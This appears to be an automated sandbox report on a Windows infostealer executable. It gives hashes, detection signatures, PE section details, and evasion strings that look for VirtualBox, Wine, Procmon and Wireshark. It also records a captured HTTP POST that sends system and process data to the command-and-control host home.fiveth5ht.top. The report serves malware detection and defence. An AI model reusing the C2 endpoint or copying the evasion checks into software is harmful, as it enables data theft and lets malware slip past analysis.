Edit tour

Windows Analysis Report
HGFSqmKwd5.exe

Overview

General Information

Sample name:	HGFSqmKwd5.exe renamed because original name is a hash value
Original sample name:	23a5d24635b116f7ff8a1835275027de.exe
Analysis ID:	1581605
MD5:	23a5d24635b116f7ff8a1835275027de
SHA1:	3a47b6b89b789387e951e452ca2bf169c4cd0c3a
SHA256:	897b0a99718bb1cb83242a09fa9542572aae3a5d2d4a5c90b6bb4be334131876
Tags:	exeuser-abuse_ch
Infos:

Detection

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Detected unpacking (changes PE section rights)

Multi AV Scanner detection for submitted file

AI detected suspicious sample

Hides threads from debuggers

Infostealer behavior detected

Leaks process information

Machine Learning detection for sample

PE file contains section with special chars

Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Tries to detect sandboxes and other dynamic analysis tools (window names)

Tries to detect virtualization through RDTSC time measurements

Tries to evade debugger and weak emulator (self modifying code)

AV process strings found (often used to terminate AV products)

Checks for debuggers (devices)

Checks if the current process is being debugged

Contains capabilities to detect virtual machines

Contains functionality to create an SMB header

Detected potential crypto function

Entry point lies outside standard sections

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

PE file contains an invalid checksum

PE file contains sections with non-standard names

Queries the volume information (name, serial number etc) of a device

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

System is w10x64

HGFSqmKwd5.exe (PID: 8076 cmdline: "C:\Users\user\Desktop\HGFSqmKwd5.exe" MD5: 23A5D24635B116F7FF8A1835275027DE)

cleanup

HTTP traffic detected: POST /OyKvQKriwnyyWjwCxSXF1735186862 HTTP/1.1Host: home.fiveth5ht.topAccept: */*Content-Type: application/jsonContent-Length: 498423Data Raw: 7b 20 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 2c 20 22 63 75 72 72 65 6e 74 5f 74 69 6d 65 22 3a 20 22 38 34 36 38 37 33 39 31 36 33 36 32 37 31 37 34 37 34 31 22 2c 20 22 4e 75 6d 5f 70 72 6f 63 65 73 73 6f 72 22 3a 20 34 2c 20 22 4e 75 6d 5f 72 61 6d 22 3a 20 37 2c 20 22 64 72 69 76 65 72 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 43 3a 5c 5c 22 2c 20 22 61 6c 6c 22 3a 20 32 32 33 2e 30 2c 20 22 66 72 65 65 22 3a 20 31 36 38 2e 30 20 7d 20 5d 2c 20 22 4e 75 6d 5f 64 69 73 70 6c 61 79 73 22 3a 20 31 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 78 22 3a 20 31 32 38 30 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 79 22 3a 20 31 30 32 34 2c 20 22 72 65 63 65 6e 74 5f 66 69 6c 65 73 22 3a 20 33 38 2c 20 22 70 72 6f 63 65 73 73 65 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 5b 53 79 73 74 65 6d 20 50 72 6f 63 65 73 73 5d 22 2c 20 22 70 69 64 22 3a 20 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 53 79 73 74 65 6d 22 2c 20 22 70 69 64 22 3a 20 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 52 65 67 69 73 74 72 79 22 2c 20 22 70 69 64 22 3a 20 39 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 6d 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 32 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 63 73 72 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 30 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 77 69 6e 69 6e 69 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 38 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 63 73 72 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 39 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 77 69 6e 6c 6f 67 6f 6e 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 35 35 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 65 72 76 69 63 65 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 36 32 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 6c 73 61 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 36 32 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 35 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 66 6f 6e 74 64 72 76 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 37 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 66 6f 6e 74 64 72 76 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 38 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 38 37 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 39 32 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 64 77 6d 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 39 38 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 36 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 35 36 20 7d 2c 2

Source: HGFSqmKwd5.exe, 00000000.00000003.1347146864.00000000077A0000.00000004.00001000.00020000.00000000.sdmp, HGFSqmKwd5.exe, 00000000.00000002.1482231895.0000000001371000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: http://.css
Source: HGFSqmKwd5.exe, 00000000.00000003.1347146864.00000000077A0000.00000004.00001000.00020000.00000000.sdmp, HGFSqmKwd5.exe, 00000000.00000002.1482231895.0000000001371000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: http://.jpg
Source: HGFSqmKwd5.exe, 00000000.00000003.1444930482.0000000001D33000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://home.fiveth5ht.top/OyKvQ
Source: HGFSqmKwd5.exe, 00000000.00000002.1482231895.0000000001371000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF17
Source: HGFSqmKwd5.exe, 00000000.00000002.1484031657.0000000001CE5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862
Source: HGFSqmKwd5.exe, 00000000.00000003.1445744019.0000000001CE2000.00000004.00000020.00020000.00000000.sdmp, HGFSqmKwd5.exe, 00000000.00000002.1484031657.0000000001CE5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF17351868626963
Source: HGFSqmKwd5.exe, 00000000.00000002.1484368647.0000000001D63000.00000004.00000020.00020000.00000000.sdmp, HGFSqmKwd5.exe, 00000000.00000003.1444930482.0000000001D63000.00000004.00000020.00020000.00000000.sdmp, HGFSqmKwd5.exe, 00000000.00000003.1444792515.0000000001D63000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862?argument=
Source: HGFSqmKwd5.exe, 00000000.00000002.1482231895.0000000001371000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxS
Source: HGFSqmKwd5.exe, 00000000.00000003.1347146864.00000000077A0000.00000004.00001000.00020000.00000000.sdmp, HGFSqmKwd5.exe, 00000000.00000002.1482231895.0000000001371000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: http://html4/loose.dtd
Source: HGFSqmKwd5.exe, 00000000.00000002.1482231895.0000000001371000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://curl.se/docs/alt-svc.html
Source: HGFSqmKwd5.exe, 00000000.00000002.1482231895.0000000001371000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://curl.se/docs/hsts.html
Source: HGFSqmKwd5.exe	String found in binary or memory: https://curl.se/docs/hsts.html#
Source: HGFSqmKwd5.exe, HGFSqmKwd5.exe, 00000000.00000003.1347146864.00000000077A0000.00000004.00001000.00020000.00000000.sdmp, HGFSqmKwd5.exe, 00000000.00000002.1482231895.0000000001371000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://curl.se/docs/http-cookies.html
Source: HGFSqmKwd5.exe, 00000000.00000003.1347146864.00000000077A0000.00000004.00001000.00020000.00000000.sdmp, HGFSqmKwd5.exe, 00000000.00000002.1482231895.0000000001371000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://httpbin.org/ip
Source: HGFSqmKwd5.exe, 00000000.00000003.1347146864.00000000077A0000.00000004.00001000.00020000.00000000.sdmp, HGFSqmKwd5.exe, 00000000.00000002.1482231895.0000000001371000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://httpbin.org/ipbefore

Source: unknown	Network traffic detected: HTTP traffic on port 49719 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49719

System Summary

PE file contains section with special chars

Source: HGFSqmKwd5.exe	Static PE information: section name:
Source: HGFSqmKwd5.exe	Static PE information: section name: .idata
Source: HGFSqmKwd5.exe	Static PE information: section name:

Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	Code function: 0_3_01D562DE	0_3_01D562DE
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	Code function: 0_3_01D43A58	0_3_01D43A58
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	Code function: 0_3_01D43A58	0_3_01D43A58
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	Code function: 0_3_01D43A58	0_3_01D43A58
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	Code function: 0_3_01D43A58	0_3_01D43A58
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	Code function: 0_3_01D43A58	0_3_01D43A58
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	Code function: 0_3_01D43A58	0_3_01D43A58
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	Code function: 0_3_01D43A58	0_3_01D43A58
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	Code function: 0_3_01D43A58	0_3_01D43A58
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	Code function: 0_3_01D43A58	0_3_01D43A58
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	Code function: 0_2_00E105B0	0_2_00E105B0
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	Code function: 0_2_00E16FA0	0_2_00E16FA0
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	Code function: 0_2_00ECB180	0_2_00ECB180
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	Code function: 0_2_00E3F100	0_2_00E3F100
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	Code function: 0_2_00ED00E0	0_2_00ED00E0
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	Code function: 0_2_0118A000	0_2_0118A000
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	Code function: 0_2_0118E050	0_2_0118E050
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	Code function: 0_2_00E66210	0_2_00E66210
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	Code function: 0_2_00ECC320	0_2_00ECC320
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	Code function: 0_2_00ED0420	0_2_00ED0420
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	Code function: 0_2_01154410	0_2_01154410
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	Code function: 0_2_01166730	0_2_01166730
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	Code function: 0_2_01184780	0_2_01184780
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	Code function: 0_2_00E0E620	0_2_00E0E620
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	Code function: 0_2_00E6A7F0	0_2_00E6A7F0
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	Code function: 0_2_00ECC770	0_2_00ECC770
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	Code function: 0_2_00E0A960	0_2_00E0A960
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	Code function: 0_2_00E14940	0_2_00E14940
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	Code function: 0_2_00EBC900	0_2_00EBC900
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	Code function: 0_2_010BAB2C	0_2_010BAB2C
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	Code function: 0_2_00FD6AC0	0_2_00FD6AC0
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	Code function: 0_2_01178BF0	0_2_01178BF0
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	Code function: 0_2_00E0CBB0	0_2_00E0CBB0
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	Code function: 0_2_00F94B60	0_2_00F94B60
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	Code function: 0_2_010BAAC0	0_2_010BAAC0
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	Code function: 0_2_01184D40	0_2_01184D40
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	Code function: 0_2_0117CD80	0_2_0117CD80
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	Code function: 0_2_0118CC90	0_2_0118CC90
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	Code function: 0_2_01152F90	0_2_01152F90
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	Code function: 0_2_0111AE30	0_2_0111AE30
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	Code function: 0_2_00ECEF90	0_2_00ECEF90
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	Code function: 0_2_00EC8F90	0_2_00EC8F90
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	Code function: 0_2_00E24F70	0_2_00E24F70
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	Code function: 0_2_00E110E6	0_2_00E110E6
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	Code function: 0_3_01D551BA	0_3_01D551BA
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	Code function: 0_3_01D56944	0_3_01D56944
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	Code function: 0_3_01D5544B	0_3_01D5544B

Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	Code function: String function: 00E0CAA0 appears 51 times
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	Code function: String function: 00FDCBC0 appears 71 times
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	Code function: String function: 00EE44A0 appears 43 times
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	Code function: String function: 00E073F0 appears 81 times
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	Code function: String function: 00FB7220 appears 71 times
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	Code function: String function: 00E44F40 appears 220 times
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	Code function: String function: 00E075A0 appears 440 times
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	Code function: String function: 00E44FD0 appears 154 times
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	Code function: String function: 00E1CCD0 appears 39 times
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	Code function: String function: 00E1CD40 appears 52 times
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	Code function: String function: 00E450A0 appears 67 times

Source: HGFSqmKwd5.exe

Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED

Source: HGFSqmKwd5.exe

Static PE information: Section: vnhasopu ZLIB complexity 0.994379132667417

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@1/0@6/2

Source: C:\Users\user\Desktop\HGFSqmKwd5.exe

Code function: 0_2_00E0255D GetSystemInfo,GlobalMemoryStatusEx,GetDriveTypeA,GetDiskFreeSpaceExA,KiUserCallbackDispatcher,FindFirstFileW,FindNextFileW,K32EnumProcesses,

0_2_00E0255D

Source: C:\Users\user\Desktop\HGFSqmKwd5.exe

Code function: 0_2_00E029FF FindFirstFileA,RegOpenKeyExA,CharUpperA,CreateToolhelp32Snapshot,QueryFullProcessImageNameA,CloseHandle,CreateToolhelp32Snapshot,CloseHandle,

0_2_00E029FF

Source: C:\Users\user\Desktop\HGFSqmKwd5.exe

Mutant created: \Sessions\1\BaseNamedObjects\My_mutex

Source: C:\Users\user\Desktop\HGFSqmKwd5.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior

Source: HGFSqmKwd5.exe	Virustotal: Detection: 57%
Source: HGFSqmKwd5.exe	ReversingLabs: Detection: 60%

Source: HGFSqmKwd5.exe	String found in binary or memory: Unable to complete request for channel-process-startup
Source: HGFSqmKwd5.exe	String found in binary or memory: 3Cannot find '%s'. Please, re-install this application

Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	Section loaded: kernel.appcore.dll	Jump to behavior

Source: HGFSqmKwd5.exe

Static file information: File size 4491776 > 1048576

Source: HGFSqmKwd5.exe	Static PE information: Raw size of is bigger than: 0x100000 < 0x288a00
Source: HGFSqmKwd5.exe	Static PE information: Raw size of vnhasopu is bigger than: 0x100000 < 0x1bc400

Data Obfuscation

Detected unpacking (changes PE section rights)

Source: C:\Users\user\Desktop\HGFSqmKwd5.exe

Unpacked PE file: 0.2.HGFSqmKwd5.exe.e00000.0.unpack :EW;.rsrc:W;.idata :W; :EW;vnhasopu:EW;cudpjwpv:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;vnhasopu:EW;cudpjwpv:EW;.taggant:EW;

Source: initial sample

Static PE information: section where entry point is pointing to: .taggant

Source: HGFSqmKwd5.exe

Static PE information: real checksum: 0x44e60b should be: 0x44e322

Source: HGFSqmKwd5.exe	Static PE information: section name:
Source: HGFSqmKwd5.exe	Static PE information: section name: .idata
Source: HGFSqmKwd5.exe	Static PE information: section name:
Source: HGFSqmKwd5.exe	Static PE information: section name: vnhasopu
Source: HGFSqmKwd5.exe	Static PE information: section name: cudpjwpv
Source: HGFSqmKwd5.exe	Static PE information: section name: .taggant

Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	Code function: 0_3_01D441C1 push cs; iretd	0_3_01D441C2
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	Code function: 0_3_01D441C1 push cs; iretd	0_3_01D441C2
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	Code function: 0_3_01D441C1 push cs; iretd	0_3_01D441C2
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	Code function: 0_3_01D441C1 push cs; iretd	0_3_01D441C2
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	Code function: 0_3_01D441E1 push cs; iretd	0_3_01D441E2
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	Code function: 0_3_01D441E1 push cs; iretd	0_3_01D441E2
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	Code function: 0_3_01D441E1 push cs; iretd	0_3_01D441E2
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	Code function: 0_3_01D441E1 push cs; iretd	0_3_01D441E2
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	Code function: 0_3_01D44161 push cs; iretd	0_3_01D44162
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	Code function: 0_3_01D44161 push cs; iretd	0_3_01D44162
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	Code function: 0_3_01D44161 push cs; iretd	0_3_01D44162
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	Code function: 0_3_01D44161 push cs; iretd	0_3_01D44162
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	Code function: 0_3_01D440E1 push cs; iretd	0_3_01D440E2
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	Code function: 0_3_01D440E1 push cs; iretd	0_3_01D440E2
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	Code function: 0_3_01D440E1 push cs; iretd	0_3_01D440E2
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	Code function: 0_3_01D440E1 push cs; iretd	0_3_01D440E2
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	Code function: 0_3_01D44081 push cs; iretd	0_3_01D44082
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	Code function: 0_3_01D44081 push cs; iretd	0_3_01D44082
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	Code function: 0_3_01D44081 push cs; iretd	0_3_01D44082
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	Code function: 0_3_01D44081 push cs; iretd	0_3_01D44082
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	Code function: 0_3_01D47827 push cs; iretd	0_3_01D477DA
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	Code function: 0_3_01D47827 push cs; iretd	0_3_01D477DA
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	Code function: 0_3_01D47827 push cs; iretd	0_3_01D477DA
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	Code function: 0_3_01D47827 push cs; iretd	0_3_01D477DA
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	Code function: 0_3_01D44821 push cs; iretd	0_3_01D44822
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	Code function: 0_3_01D44821 push cs; iretd	0_3_01D44822
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	Code function: 0_3_01D44821 push cs; iretd	0_3_01D44822
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	Code function: 0_3_01D44821 push cs; iretd	0_3_01D44822
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	Code function: 0_3_01D443C1 push cs; iretd	0_3_01D443C2
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	Code function: 0_3_01D443C1 push cs; iretd	0_3_01D443C2
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	Code function: 0_3_01D443C1 push cs; iretd	0_3_01D443C2

Source: HGFSqmKwd5.exe

Static PE information: section name: vnhasopu entropy: 7.955555912255795

Boot Survival

Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	Window searched: window name: Regmonclass	Jump to behavior
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	Window searched: window name: Filemonclass	Jump to behavior
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	Window searched: window name: Regmonclass	Jump to behavior

Malware Analysis System Evasion

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	File opened: HKEY_CURRENT_USER\Software\Wine			Jump to behavior
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__			Jump to behavior

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: HGFSqmKwd5.exe, 00000000.00000003.1347146864.00000000077A0000.00000004.00001000.00020000.00000000.sdmp, HGFSqmKwd5.exe, 00000000.00000002.1482231895.0000000001371000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: PROCMON.EXE
Source: HGFSqmKwd5.exe, 00000000.00000003.1347146864.00000000077A0000.00000004.00001000.00020000.00000000.sdmp, HGFSqmKwd5.exe, 00000000.00000002.1482231895.0000000001371000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: X64DBG.EXE
Source: HGFSqmKwd5.exe, 00000000.00000003.1347146864.00000000077A0000.00000004.00001000.00020000.00000000.sdmp, HGFSqmKwd5.exe, 00000000.00000002.1482231895.0000000001371000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: WINDBG.EXE
Source: HGFSqmKwd5.exe, 00000000.00000002.1482231895.0000000001371000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: SYSINTERNALSNUM_PROCESSORNUM_RAMNAMEALLFREEDRIVERSNUM_DISPLAYSRESOLUTION_XRESOLUTION_Y\RECENT_FILESPROCESSESUPTIME_MINUTESC:\WINDOWS\SYSTEM32\VBOX.DLL01VBOX_FIRSTSYSTEM\CONTROLSET001\SERVICES\VBOXSFVBOX_SECONDC:\USERS\PUBLIC\PUBLIC_CHECKWINDBG.EXEDBGWIRESHARK.EXEPROCMON.EXEX64DBG.EXEIDA.EXEDBG_SECDBG_THIRDYADROINSTALLED_APPSSOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALLSOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL%D%S\%SDISPLAYNAMEAPP_NAMEINDEXCREATETOOLHELP32SNAPSHOT FAILED.
Source: HGFSqmKwd5.exe, 00000000.00000003.1347146864.00000000077A0000.00000004.00001000.00020000.00000000.sdmp, HGFSqmKwd5.exe, 00000000.00000002.1482231895.0000000001371000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: WIRESHARK.EXE

